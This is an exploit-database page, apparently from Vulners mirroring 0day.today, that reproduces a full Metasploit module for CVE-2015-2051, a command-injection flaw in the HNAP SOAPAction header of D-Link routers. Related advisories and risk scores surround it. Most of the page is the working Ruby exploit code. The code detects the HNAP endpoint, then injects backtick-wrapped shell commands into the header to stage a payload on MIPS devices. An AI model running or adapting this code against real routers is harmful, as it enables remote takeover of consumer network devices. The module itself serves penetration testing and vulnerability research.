Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

D-Link Devices HNAP SOAPAction-Header Command Execution Exploit

🗓️ 02 Jun 2015 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 492 Views

D-Link devices vulnerable to command injection via HNAP SOAP interface, affecting multiple models.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2015-2051
23 Feb 201500:00
attackerkb
BDU FSTEC		The vulnerability of the HNAP interface of the D-Link DAP-1320 wireless router allows a hacker to execute arbitrary code.
15 Jun 201500:00
bdu_fstec
Circl		CVE-2015-2051
1 Jun 201500:00
circl
CISA KEV Catalog		D-Link DIR-645 Router Remote Code Execution Vulnerability
10 Feb 202200:00
cisa_kev
CISA		CISA Adds 15 Known Exploited Vulnerabilities to Catalog
10 Feb 202200:00
cisa
CNVD		D-Link DIR-645 Wired/Wireless Router OS Command Injection Vulnerability
28 Feb 201500:00
cnvd
Check Point Advisories		D-Link Multiple Products Remote Code Execution (CVE-2015-2051; CVE-2022-37056)
3 Oct 201800:00
checkpoint_advisories
CVE		CVE-2015-2051
23 Feb 201517:00
cve
Cvelist		CVE-2015-2051
23 Feb 201517:00
cvelist
Tenable Nessus		D-Link Router HNAP GetDeviceSettings Remote Command Execution
10 Jun 201500:00
nessus
Rows per page
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link Devices HNAP SOAPAction-Header Command Execution',
      'Description' => %q{
        Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP
        interface. Since it is a blind OS command injection vulnerability, there is no
        output for the executed command. This module has been tested on a DIR-645 device.
        The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
        DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
        DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
      },
      'Author'      =>
        [
          'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
          'Craig Heffner',  # independent Vulnerability discovery on different other routers
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
          ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
        ],
      'DisclosureDate' => 'Feb 13 2015',
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Targets' =>
        [
          [ 'MIPS Little Endian',
            {
              'Arch'     => ARCH_MIPSLE
            }
          ],
          [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
            {
              'Arch'     => ARCH_MIPSBE
            }
          ]
        ],
      'DefaultTarget'    => 0
      ))
 
      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')
  end
 
  def check
    uri = '/HNAP1/'
    soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
 
    begin
      res = send_request_cgi({
        'uri'    => uri,
        'method' => 'GET',
        'headers' => {
          'SOAPAction' => soap_action,
          }
      })
 
      if res && [200].include?(res.code) && res.body =~ /D-Link/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end
 
    Exploit::CheckCode::Unknown
  end
 
  def exploit
    print_status("#{peer} - Trying to access the device ...")
 
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
    end
 
    print_status("#{peer} - Exploiting...")
 
    execute_cmdstager(
      :flavour  => :echo,
      :linemax => 200,
      :temp    => ''
    )
  end
 
  def execute_command(cmd, opts)
 
    uri = '/HNAP1/'
 
    # we can not use / in our command so we need to use a little trick
    cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
    soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
 
    begin
      res = send_request_cgi({
        'uri'    => uri,
        'method' => 'GET',
        'headers' => {
          'SOAPAction' => soap_action,
          }
      }, 3)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Jun 2015 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.92707
d-link devicescommand injectionhnap soap interfacesecurity vulnerabilityaffected models.
492